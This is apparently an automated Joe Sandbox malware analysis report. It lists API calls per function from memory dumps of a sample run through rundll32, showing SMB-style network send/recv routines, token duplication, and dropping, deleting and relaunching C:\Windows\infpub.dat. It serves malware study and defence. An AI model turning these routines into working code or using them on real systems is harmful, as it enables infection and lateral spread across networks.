GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,757DFE8D,?,?,?,?,?,?,?,?), ref: 004721F5
HeapAlloc.KERNEL32(00000000), ref: 004721FE
GetProcessHeap.KERNEL32(00000008,0000002D,?), ref: 00472210
HeapAlloc.KERNEL32(00000000), ref: 00472213
htons.WS2_32(00000029), ref: 0047222E
send.WS2_32(?,?,0000002D,00000000), ref: 00472255
recv.WS2_32(?,?,0000FFFF,00000000), ref: 00472271
memset.MSVCRT ref: 00472297
GetProcessHeap.KERNEL32(00000008,00000027), ref: 004722A3
HeapAlloc.KERNEL32(00000000), ref: 004722A6
htons.WS2_32(00000023), ref: 004722C1
send.WS2_32(?,?,00000027,00000000), ref: 004722DA
recv.WS2_32(?,?,0000FFFF,00000000), ref: 004722F2
GetProcessHeap.KERNEL32(00000008,?), ref: 00472314
HeapFree.KERNEL32(00000000), ref: 00472317
GetProcessHeap.KERNEL32(00000008,?), ref: 00472323
HeapFree.KERNEL32(00000000), ref: 00472326
GetProcessHeap.KERNEL32(00000008,?), ref: 00472331
HeapFree.KERNEL32(00000000), ref: 00472334

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004746C7, Relevance: 25.3, APIs: 20, Instructions: 333

APIs

GetProcessHeap.KERNEL32(00000008,00000090,?,?,00000000,00000000,?,00000000,00000000,?), ref: 004746E4
HeapAlloc.KERNEL32(00000000), ref: 004746E7

Part of subcall function 00472497: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,0047471C,?,?,?,?,?), ref: 004724AF
Part of subcall function 00472497: HeapAlloc.KERNEL32(00000000,?,?,?,0047471C,?,?,?,?,?), ref: 004724B8
Part of subcall function 00472497: GetProcessHeap.KERNEL32(00000008,00001124,757DFE8D,?,?,?,0047471C,?,?,?,?,?), ref: 004724CD
Part of subcall function 00472497: HeapAlloc.KERNEL32(00000000,?,?,?,0047471C,?,?,?,?,?), ref: 004724D0
Part of subcall function 00472497: rand.MSVCRT ref: 004724E1
Part of subcall function 00472497: htons.WS2_32(00001120), ref: 004724FF
Part of subcall function 00472497: rand.MSVCRT ref: 0047255F
Part of subcall function 00472497: GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,0047471C,?,?,?,?,?), ref: 00472576
Part of subcall function 00472497: HeapAlloc.KERNEL32(00000000,?,?,?,0047471C,?,?,?,?,?), ref: 0047257D
Part of subcall function 00472497: htons.WS2_32(0000015C), ref: 0047259F
Part of subcall function 00472497: rand.MSVCRT ref: 004725CD
Part of subcall function 00472497: GetProcessHeap.KERNEL32(00000008,00001284,?,?,?,0047471C,?,?,?,?,?), ref: 004725E4
Part of subcall function 00472497: HeapAlloc.KERNEL32(00000000,?,?,?,0047471C,?,?,?,?,?), ref: 004725EB
Part of subcall function 00472497: memcpy.MSVCRT ref: 00472605
Part of subcall function 00472497: memcpy.MSVCRT ref: 00472617
Part of subcall function 00472497: send.WS2_32(?,00000000,0000111C,00000000), ref: 00472630
Part of subcall function 00472497: send.WS2_32(?,?,00000168,00000000), ref: 0047264D
Part of subcall function 00472497: recv.WS2_32(?,?,0000FFFF,00000000), ref: 00472697
Part of subcall function 00472497: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,0047471C,?,?,?,?,?), ref: 004726BF
Part of subcall function 00472497: HeapFree.KERNEL32(00000000), ref: 004726C6
Part of subcall function 00472497: GetProcessHeap.KERNEL32(00000008,?,?,?,?,0047471C,?,?,?,?,?), ref: 004726CF
Part of subcall function 00472497: HeapFree.KERNEL32(00000000), ref: 004726D6
Part of subcall function 00472497: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,0047471C,?,?,?,?,?), ref: 004726DF
Part of subcall function 00472497: HeapFree.KERNEL32(00000000), ref: 004726E6
Part of subcall function 00472497: GetProcessHeap.KERNEL32(00000008,?,?,?,?,0047471C,?,?,?,?,?), ref: 004726F1
Part of subcall function 00472497: HeapFree.KERNEL32(00000000), ref: 004726F8

Part of subcall function 004729A2: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,757DFE8D,?,00474775), ref: 004729BF
Part of subcall function 004729A2: HeapAlloc.KERNEL32(00000000,?,00474775), ref: 004729C8
Part of subcall function 004729A2: GetProcessHeap.KERNEL32(00000008,00001124,?,00474775), ref: 004729DC
Part of subcall function 004729A2: HeapAlloc.KERNEL32(00000000,?,00474775), ref: 004729DF
Part of subcall function 004729A2: rand.MSVCRT ref: 004729F0
Part of subcall function 004729A2: htons.WS2_32(00000050), ref: 00472A25
Part of subcall function 004729A2: rand.MSVCRT ref: 00472A7E
Part of subcall function 004729A2: rand.MSVCRT ref: 00472A96
Part of subcall function 004729A2: send.WS2_32(00000000,00000000,00000054,00000000), ref: 00472ABB
Part of subcall function 004729A2: recv.WS2_32(00000000,?,0000FFFF,00000000), ref: 00472AD2
Part of subcall function 004729A2: rand.MSVCRT ref: 00472AE7
Part of subcall function 004729A2: htons.WS2_32(00001120), ref: 00472B06
Part of subcall function 004729A2: GetProcessHeap.KERNEL32(00000008,00000160,?,00474775), ref: 00472B6A
Part of subcall function 004729A2: HeapAlloc.KERNEL32(00000000,?,00474775), ref: 00472B71
Part of subcall function 004729A2: htons.WS2_32(0000015C), ref: 00472B90
Part of subcall function 004729A2: rand.MSVCRT ref: 00472BBE
Part of subcall function 004729A2: GetProcessHeap.KERNEL32(00000008,00000048,?,00474775), ref: 00472BD2
Part of subcall function 004729A2: HeapAlloc.KERNEL32(00000000,?,00474775), ref: 00472BD9
Part of subcall function 004729A2: htons.WS2_32(00000044), ref: 00472BF8
Part of subcall function 004729A2: GetProcessHeap.KERNEL32(00000008,00001638,?,00474775), ref: 00472C58
Part of subcall function 004729A2: HeapAlloc.KERNEL32(00000000,?,00474775), ref: 00472C5F
Part of subcall function 004729A2: memcpy.MSVCRT ref: 00472C79
Part of subcall function 004729A2: memcpy.MSVCRT ref: 00472C90
Part of subcall function 004729A2: htons.WS2_32(00000050), ref: 00472C9A
Part of subcall function 004729A2: memcpy.MSVCRT ref: 00472D17
Part of subcall function 004729A2: send.WS2_32(00000004,00000004,0000111C,0000000B), ref: 00472D37
Part of subcall function 004729A2: send.WS2_32(00000004,-00001118,0000051C,0000000B), ref: 00472D4F
Part of subcall function 004729A2: recv.WS2_32(00000004,?,0000FFFF,0000000B), ref: 00472D86
Part of subcall function 004729A2: GetProcessHeap.KERNEL32(00000008,00000004,?,?,?,?,?,?,?,?,?,?,00474775), ref: 00472DB3
Part of subcall function 004729A2: HeapFree.KERNEL32(00000000), ref: 00472DBA
Part of subcall function 004729A2: GetProcessHeap.KERNEL32(00000008,?,?,00474775), ref: 00472DC6
Part of subcall function 004729A2: HeapFree.KERNEL32(00000000,?,00474775), ref: 00472DCD
Part of subcall function 004729A2: GetProcessHeap.KERNEL32(00000008,?,?,00474775), ref: 00472DD9
Part of subcall function 004729A2: HeapFree.KERNEL32(00000000,?,00474775), ref: 00472DE0
Part of subcall function 004729A2: GetProcessHeap.KERNEL32(00000008,00000000,?,00474775), ref: 00472DE9
Part of subcall function 004729A2: HeapFree.KERNEL32(00000000,?,00474775), ref: 00472DF0
Part of subcall function 004729A2: GetProcessHeap.KERNEL32(00000008,?,?,00474775), ref: 00472DFB
Part of subcall function 004729A2: HeapFree.KERNEL32(00000000,?,00474775), ref: 00472E02

Part of subcall function 004721DC: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,757DFE8D,?,?,?,?,?,?,?,?), ref: 004721F5
Part of subcall function 004721DC: HeapAlloc.KERNEL32(00000000), ref: 004721FE
Part of subcall function 004721DC: GetProcessHeap.KERNEL32(00000008,0000002D,?), ref: 00472210
Part of subcall function 004721DC: HeapAlloc.KERNEL32(00000000), ref: 00472213
Part of subcall function 004721DC: htons.WS2_32(00000029), ref: 0047222E
Part of subcall function 004721DC: send.WS2_32(?,?,0000002D,00000000), ref: 00472255
Part of subcall function 004721DC: recv.WS2_32(?,?,0000FFFF,00000000), ref: 00472271
Part of subcall function 004721DC: memset.MSVCRT ref: 00472297
Part of subcall function 004721DC: GetProcessHeap.KERNEL32(00000008,00000027), ref: 004722A3
Part of subcall function 004721DC: HeapAlloc.KERNEL32(00000000), ref: 004722A6
Part of subcall function 004721DC: htons.WS2_32(00000023), ref: 004722C1
Part of subcall function 004721DC: send.WS2_32(?,?,00000027,00000000), ref: 004722DA
Part of subcall function 004721DC: recv.WS2_32(?,?,0000FFFF,00000000), ref: 004722F2
Part of subcall function 004721DC: GetProcessHeap.KERNEL32(00000008,?), ref: 00472314
Part of subcall function 004721DC: HeapFree.KERNEL32(00000000), ref: 00472317
Part of subcall function 004721DC: GetProcessHeap.KERNEL32(00000008,?), ref: 00472323
Part of subcall function 004721DC: HeapFree.KERNEL32(00000000), ref: 00472326
Part of subcall function 004721DC: GetProcessHeap.KERNEL32(00000008,?), ref: 00472331
Part of subcall function 004721DC: HeapFree.KERNEL32(00000000), ref: 00472334

Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0047478F

Part of subcall function 00472E12: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 00472E32
Part of subcall function 00472E12: HeapAlloc.KERNEL32(00000000), ref: 00472E3B
Part of subcall function 00472E12: GetProcessHeap.KERNEL32(00000008,00000048,757DFE8D), ref: 00472E4D
Part of subcall function 00472E12: HeapAlloc.KERNEL32(00000000), ref: 00472E50
Part of subcall function 00472E12: htons.WS2_32(00000044), ref: 00472E68
Part of subcall function 00472E12: send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 00472EF3
Part of subcall function 00472E12: recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 00472F0B
Part of subcall function 00472E12: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00472F31
Part of subcall function 00472E12: HeapFree.KERNEL32(00000000), ref: 00472F38
Part of subcall function 00472E12: GetProcessHeap.KERNEL32(00000008,?), ref: 00472F43
Part of subcall function 00472E12: HeapFree.KERNEL32(00000000), ref: 00472F4A

GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?), ref: 004747B4
HeapFree.KERNEL32(00000000), ref: 004747B7

Part of subcall function 0047317C: GetProcessHeap.KERNEL32(00000008,00000200,?,?,?,?,004747E5,?,?,00000000,?,?,?,?,?,?), ref: 0047318E
Part of subcall function 0047317C: HeapAlloc.KERNEL32(00000000,?,?,?,004747E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00473195
Part of subcall function 0047317C: rand.MSVCRT ref: 004731AF
Part of subcall function 0047317C: rand.MSVCRT ref: 004731BD
Part of subcall function 0047317C: GetProcessHeap.KERNEL32(00000008,?,?,00000000,000000FF,00000004,?,00000200,?,?,?,004747E5,?,?,00000000,?), ref: 004731F4
Part of subcall function 0047317C: HeapFree.KERNEL32(00000000), ref: 004731FB

GetProcessHeap.KERNEL32(00000008,00000100,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004747F0
HeapAlloc.KERNEL32(00000000), ref: 004747F9
GetProcessHeap.KERNEL32(00000008,00000027), ref: 00474810
HeapAlloc.KERNEL32(00000000), ref: 00474813
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000002), ref: 00474875
HeapFree.KERNEL32(00000000), ref: 00474878
Sleep.KERNEL32(000007D0), ref: 0047488D
GetProcessHeap.KERNEL32(00000008,00000029), ref: 00474897
HeapAlloc.KERNEL32(00000000), ref: 0047489A

Part of subcall function 004732AF: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,?), ref: 004732CB
Part of subcall function 004732AF: HeapAlloc.KERNEL32(00000000), ref: 004732D4
Part of subcall function 004732AF: GetProcessHeap.KERNEL32(00000008,?,757DFE8D), ref: 004732EF
Part of subcall function 004732AF: HeapAlloc.KERNEL32(00000000), ref: 004732F2
Part of subcall function 004732AF: htons.WS2_32(?), ref: 0047330F
Part of subcall function 004732AF: memcpy.MSVCRT ref: 0047333D
Part of subcall function 004732AF: send.WS2_32(?,00000000,?,00000000), ref: 00473350
Part of subcall function 004732AF: recv.WS2_32(?,?,0000FFFF,00000000), ref: 00473368
Part of subcall function 004732AF: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0047337B
Part of subcall function 004732AF: HeapFree.KERNEL32(00000000), ref: 00473382
Part of subcall function 004732AF: GetProcessHeap.KERNEL32(00000008,?), ref: 0047338D
Part of subcall function 004732AF: HeapFree.KERNEL32(00000000), ref: 00473394

GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,?), ref: 00474911
HeapFree.KERNEL32(00000000), ref: 00474914
GetProcessHeap.KERNEL32(00000008,00000013), ref: 004749D2
HeapAlloc.KERNEL32(00000000), ref: 004749D5

Part of subcall function 004733A4: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,00473745,?,?,?,00000000,00000000,?,?,?,00474A6E), ref: 004733BB
Part of subcall function 004733A4: HeapAlloc.KERNEL32(00000000,?,00473745,?,?,?,00000000,00000000,?,?,?,00474A6E,?,?,?,?), ref: 004733C2
Part of subcall function 004733A4: htons.WS2_32(?), ref: 004733E1
Part of subcall function 004733A4: memcpy.MSVCRT ref: 00473410
Part of subcall function 004733A4: send.WS2_32(?,00000000,?,00000000), ref: 00473421
Part of subcall function 004733A4: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00473434
Part of subcall function 004733A4: HeapFree.KERNEL32(00000000), ref: 0047343B

Part of subcall function 00473680: GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,757DFE8D,?,?,00474A6E,?,?,?,?,00000000,?), ref: 00473698
Part of subcall function 00473680: HeapAlloc.KERNEL32(00000000,?,?,00474A6E,?,?,?,?,00000000,?), ref: 004736A1
Part of subcall function 00473680: GetProcessHeap.KERNEL32(00000008,00000027,?,?,00474A6E,?,?,?,?,00000000,?), ref: 004736B1
Part of subcall function 00473680: HeapAlloc.KERNEL32(00000000,?,?,00474A6E,?,?,?,?,00000000,?), ref: 004736B4
Part of subcall function 00473680: GetProcessHeap.KERNEL32(00000008,00000013,?,?,00474A6E,?,?,?,?,00000000,?), ref: 004736C7
Part of subcall function 00473680: HeapAlloc.KERNEL32(00000000,?,?,00474A6E,?,?,?,?,00000000,?), ref: 004736CA
Part of subcall function 00473680: Sleep.KERNEL32(000007D0,?,?,?,00000000,00000000,?,?,?,00474A6E,?,?,?,?,00000000,?), ref: 004737A2
Part of subcall function 00473680: Sleep.KERNEL32(000007D0,?,?,?,00000000,00000000,00000005,?,?,00474A6E,?,?,?,?,00000000,?), ref: 0047388D
Part of subcall function 00473680: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,?,?,00000000,00000000,?,?,?,?,00000000,00000000,?), ref: 0047393B
Part of subcall function 00473680: HeapAlloc.KERNEL32(00000000,?,?,00474A6E,?,?,?,?,00000000,?), ref: 00473942
Part of subcall function 00473680: memset.MSVCRT ref: 00473958
Part of subcall function 00473680: recv.WS2_32(?,00000000,0000FFFF,00000000), ref: 0047398D
Part of subcall function 00473680: htons.WS2_32(?), ref: 004739AD
Part of subcall function 00473680: Sleep.KERNEL32(000007D0,?,?,00000000,00000000,00000000,?), ref: 00473A95
Part of subcall function 00473680: rand.MSVCRT ref: 00473AA3
Part of subcall function 00473680: Sleep.KERNEL32(000007D0,?,?,00000000,00000000,00000000,?), ref: 00473B18
Part of subcall function 00473680: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,?), ref: 00473B27
Part of subcall function 00473680: HeapFree.KERNEL32(00000000), ref: 00473B2E
Part of subcall function 00473680: Sleep.KERNEL32(000007D0,?,?,?,00000000,00000000,?,?,?,00474A6E,?,?,?,?,00000000,?), ref: 00473BB7
Part of subcall function 00473680: Sleep.KERNEL32(000007D0,?,?,?,00000000,00000000,?,?,?,00474A6E,?,?,?,?,00000000,?), ref: 00473C64
Part of subcall function 00473680: rand.MSVCRT ref: 00473C89
Part of subcall function 00473680: Sleep.KERNEL32(000007D0,?,?,?,00000000,00000000,?,?,?,00474A6E,?,?,?,?,00000000,?), ref: 00473CC7
Part of subcall function 00473680: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,?,?,?,00474A6E,?,?,?,?,00000000), ref: 00473CD4
Part of subcall function 00473680: HeapFree.KERNEL32(00000000), ref: 00473CDB
Part of subcall function 00473680: GetProcessHeap.KERNEL32(00000008,00000000,?,?,00474A6E,?,?,?,?,00000000,?), ref: 00473CE4
Part of subcall function 00473680: HeapFree.KERNEL32(00000000), ref: 00473CEB
Part of subcall function 00473680: GetProcessHeap.KERNEL32(00000008,00000000,?,?,00474A6E,?,?,?,?,00000000,?), ref: 00473CFA
Part of subcall function 00473680: HeapFree.KERNEL32(00000000), ref: 00473CFD

Part of subcall function 004741E9: GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,757DFE8D), ref: 004741FD
Part of subcall function 004741E9: HeapAlloc.KERNEL32(00000000), ref: 00474204
Part of subcall function 004741E9: GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000100,?,?,?,?,?,00000000,00000002), ref: 00474287
Part of subcall function 004741E9: HeapFree.KERNEL32(00000000), ref: 0047428E
Part of subcall function 004741E9: GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 004742D9
Part of subcall function 004741E9: HeapFree.KERNEL32(00000000), ref: 004742E0
Part of subcall function 004741E9: GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 00474336
Part of subcall function 004741E9: HeapFree.KERNEL32(00000000), ref: 0047433D
Part of subcall function 004741E9: GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,757DFE8D,?,00000000,00000100,?), ref: 00474399
Part of subcall function 004741E9: HeapFree.KERNEL32(00000000), ref: 004743A0
Part of subcall function 004741E9: memset.MSVCRT ref: 004743AE
Part of subcall function 004741E9: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,00000000,00000002), ref: 0047466C
Part of subcall function 004741E9: HeapFree.KERNEL32(00000000), ref: 00474673

Part of subcall function 00473209: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,00473BAA,?,?,?,00000000,00000000,?,?,?,00474A6E), ref: 00473220
Part of subcall function 00473209: HeapAlloc.KERNEL32(00000000,?,00473BAA,?,?,?,00000000,00000000,?,?,?,00474A6E,?,?,?,?), ref: 00473227
Part of subcall function 00473209: htons.WS2_32(?), ref: 00473246
Part of subcall function 00473209: memcpy.MSVCRT ref: 00473276
Part of subcall function 00473209: send.WS2_32(?,00000000,?,00000000), ref: 00473287
Part of subcall function 00473209: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0047329A
Part of subcall function 00473209: HeapFree.KERNEL32(00000000), ref: 004732A1

GetProcessHeap.KERNEL32(00000008,00000000), ref: 00474A96
HeapFree.KERNEL32(00000000), ref: 00474A99

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047A1A9, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 149

APIs

GetProcessHeap.KERNEL32(00000008,00000008), ref: 0047A1EB
HeapAlloc.KERNEL32(00000000), ref: 0047A1F4
GetProcessHeap.KERNEL32(00000008,00000021), ref: 0047A209
HeapAlloc.KERNEL32(00000000), ref: 0047A20C
CreateThread.KERNEL32(00000000,00000000,Function_0000A112,00000000,00000000,00000000), ref: 0047A258
GetModuleHandleA.KERNEL32(kernel32,WaitForMultipleObjects,00000000), ref: 0047A290
GetProcAddress.KERNEL32(00000000), ref: 0047A297
CloseHandle.KERNEL32(00000000), ref: 0047A2E1
GetProcessHeap.KERNEL32(00000008,00000008), ref: 0047A2EE
HeapAlloc.KERNEL32(00000000), ref: 0047A2F1
GetProcessHeap.KERNEL32(00000008,00000021), ref: 0047A2FD
HeapAlloc.KERNEL32(00000000), ref: 0047A300

Part of subcall function 00476B46: GetProcessHeap.KERNEL32(00000000,"gG,?,00476722,?), ref: 00476B4E
Part of subcall function 00476B46: HeapFree.KERNEL32(00000000,?,00476722), ref: 00476B55

Part of subcall function 0047A016: GetCurrentThread.KERNEL32(0000000B,00000001,?), ref: 0047A035
Part of subcall function 0047A016: OpenThreadToken.ADVAPI32(00000000), ref: 0047A03C
Part of subcall function 0047A016: DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 0047A059
Part of subcall function 0047A016: CloseHandle.KERNEL32(?), ref: 0047A0F5
Part of subcall function 0047A016: CloseHandle.KERNEL32(0000FFFF), ref: 0047A105

Strings

WaitForMultipleObjects, xrefs: 0047A286
kernel32, xrefs: 0047A28B

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00471CA3, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 108

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,00475414,00000000,?,0BADF00D,?,?,?,?,0047943A,?), ref: 00471CBD
RtlAllocateHeap.NTDLL(00000000,?,?,?,?,0047943A,?), ref: 00471CC6
GetProcessHeap.KERNEL32(00000008,00000033,?,?,?,?,0047943A,?), ref: 00471CD7
HeapAlloc.KERNEL32(00000000,?,?,?,?,0047943A,?), ref: 00471CDA
htons.WS2_32(0000002F), ref: 00471CF7
send.WS2_32(00000033,00000000,00000033,00000000), ref: 00471D26
recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 00471D3D

Part of subcall function 00471747: GetProcessHeap.KERNEL32(00000008,?,00000000,002F16E0,00000000,00471C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 00471783
Part of subcall function 00471747: HeapAlloc.KERNEL32(00000000), ref: 0047178C
Part of subcall function 00471747: CharUpperW.USER32(00000000), ref: 004717B2
Part of subcall function 00471747: GetProcessHeap.KERNEL32(00000008,00000086), ref: 004717DA
Part of subcall function 00471747: HeapAlloc.KERNEL32(00000000), ref: 004717DD
Part of subcall function 00471747: htons.WS2_32(00000082), ref: 00471801
Part of subcall function 00471747: send.WS2_32(00000086,?,00000086,00000041), ref: 00471863
Part of subcall function 00471747: recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 0047187F
Part of subcall function 00471747: GetProcessHeap.KERNEL32(00000008,00000018), ref: 004718F4
Part of subcall function 00471747: HeapAlloc.KERNEL32(00000000), ref: 004718FD
Part of subcall function 00471747: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000,?,00008003,00008003,?,?,00000000,?,00008002), ref: 00471958
Part of subcall function 00471747: HeapAlloc.KERNEL32(00000000), ref: 0047195B
Part of subcall function 00471747: rand.MSVCRT ref: 00471983
Part of subcall function 00471747: GetProcessHeap.KERNEL32(00000008,00000018,?,00000010,?,?,00008003), ref: 004719B8
Part of subcall function 00471747: HeapAlloc.KERNEL32(00000000), ref: 004719BB
Part of subcall function 00471747: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00471A13
Part of subcall function 00471747: HeapAlloc.KERNEL32(00000000), ref: 00471A16
Part of subcall function 00471747: htons.WS2_32(-000000FC), ref: 00471A39
Part of subcall function 00471747: memcpy.MSVCRT ref: 00471B48
Part of subcall function 00471747: send.WS2_32(?,00000000,00000000,00000000), ref: 00471B7A
Part of subcall function 00471747: recv.WS2_32(?,?,0000FFFF,00000000), ref: 00471B93
Part of subcall function 00471747: memset.MSVCRT ref: 00471BAB
Part of subcall function 00471747: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00471BB6
Part of subcall function 00471747: HeapFree.KERNEL32(00000000), ref: 00471BBD
Part of subcall function 00471747: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00471BC8
Part of subcall function 00471747: HeapFree.KERNEL32(00000000), ref: 00471BCF
Part of subcall function 00471747: GetProcessHeap.KERNEL32(00000008,?), ref: 00471BE3
Part of subcall function 00471747: HeapFree.KERNEL32(00000000), ref: 00471BE6
Part of subcall function 00471747: GetProcessHeap.KERNEL32(00000008,?,?,00000010,?,?,00008003), ref: 00471BF1
Part of subcall function 00471747: HeapFree.KERNEL32(00000000), ref: 00471BF4
Part of subcall function 00471747: GetProcessHeap.KERNEL32(00000008,?), ref: 00471BFF
Part of subcall function 00471747: HeapFree.KERNEL32(00000000), ref: 00471C02
Part of subcall function 00471747: GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,00008002), ref: 00471C0D
Part of subcall function 00471747: HeapFree.KERNEL32(00000000), ref: 00471C10
Part of subcall function 00471747: GetProcessHeap.KERNEL32(00000008,?), ref: 00471C19
Part of subcall function 00471747: HeapFree.KERNEL32(00000000), ref: 00471C1C
Part of subcall function 00471747: GetProcessHeap.KERNEL32(00000008,?), ref: 00471C27
Part of subcall function 00471747: HeapFree.KERNEL32(00000000), ref: 00471C2A

GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0047943A,?), ref: 00471DA8
HeapFree.KERNEL32(00000000), ref: 00471DAF
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0047943A,?), ref: 00471DBA
HeapFree.KERNEL32(00000000), ref: 00471DC1

Strings

x, xrefs: 00471D9F
NT LM 0.12, xrefs: 00471D13
lH, xrefs: 00471D66, 00471D76

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00479154, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 81

APIs

FreeLibrary.KERNEL32 ref: 00479161
CreateFileW.KERNEL32(C:\Windows\infpub.dat,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00479198
GetFileSize.KERNEL32(00000000,00000000), ref: 004791A3
CloseHandle.KERNEL32(?), ref: 004791AF
CreateFileW.KERNEL32(C:\Windows\infpub.dat,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004791C1
GetProcessHeap.KERNEL32(00000008,?), ref: 004791D5
RtlAllocateHeap.NTDLL(00000000), ref: 004791D8
WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 004791F1
GetProcessHeap.KERNEL32(00000000,?), ref: 004791FB
HeapFree.KERNEL32(00000000), ref: 004791FE
CloseHandle.KERNEL32(?), ref: 00479207
DeleteFileW.KERNELBASE(C:\Windows\infpub.dat), ref: 0047920E

Part of subcall function 00479016: VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 00479090
Part of subcall function 00479016: LoadLibraryA.KERNEL32(?), ref: 004790BA
Part of subcall function 00479016: GetProcAddress.KERNEL32(00000000,00470000), ref: 004790FD
Part of subcall function 00479016: VirtualProtect.KERNELBASE(?,?,?,?), ref: 0047913D

ExitProcess.KERNEL32 ref: 00479234

Part of subcall function 004779D7: ExitProcess.KERNEL32 ref: 00477A07
Part of subcall function 004779D7: WSAStartup.WS2_32(00000202,004881E0), ref: 00477A3D
Part of subcall function 004779D7: InitializeCriticalSection.KERNEL32(00487B9C,00000008,004767F9,0047682F,000000FF,00000024,00476AA8,00000000,0000FFFF), ref: 00477A80
Part of subcall function 004779D7: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,000000FF,?,?), ref: 00477AAD
Part of subcall function 004779D7: CreateThread.KERNEL32(00000000,00000000,00478A6F,00000000,00000000,00000000), ref: 00477AC6
Part of subcall function 004779D7: CreateThread.KERNEL32(00000000,00000000,004777D1,00000000,00000000,00000000), ref: 00477ADF
Part of subcall function 004779D7: CreateThread.KERNEL32(00000000,00000000,0047A1A9,00000000,00000000,00000000), ref: 00477B78
Part of subcall function 004779D7: Sleep.KERNELBASE(?,000000FF), ref: 00477B93
Part of subcall function 004779D7: Sleep.KERNELBASE(?), ref: 00477BEB
Part of subcall function 004779D7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00477C0E
Part of subcall function 004779D7: lstrcatW.KERNEL32(?,\rundll32.exe), ref: 00477C28
Part of subcall function 004779D7: GetModuleFileNameW.KERNEL32(C:\Windows\infpub.dat,0000030C), ref: 00477C43
Part of subcall function 004779D7: PathFindFileNameW.SHLWAPI(C:\Windows\infpub.dat), ref: 00477C51
Part of subcall function 004779D7: wsprintfW.USER32 ref: 00477C6B
Part of subcall function 004779D7: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00477CB3
Part of subcall function 004779D7: ExitProcess.KERNEL32 ref: 00477CBA

Strings

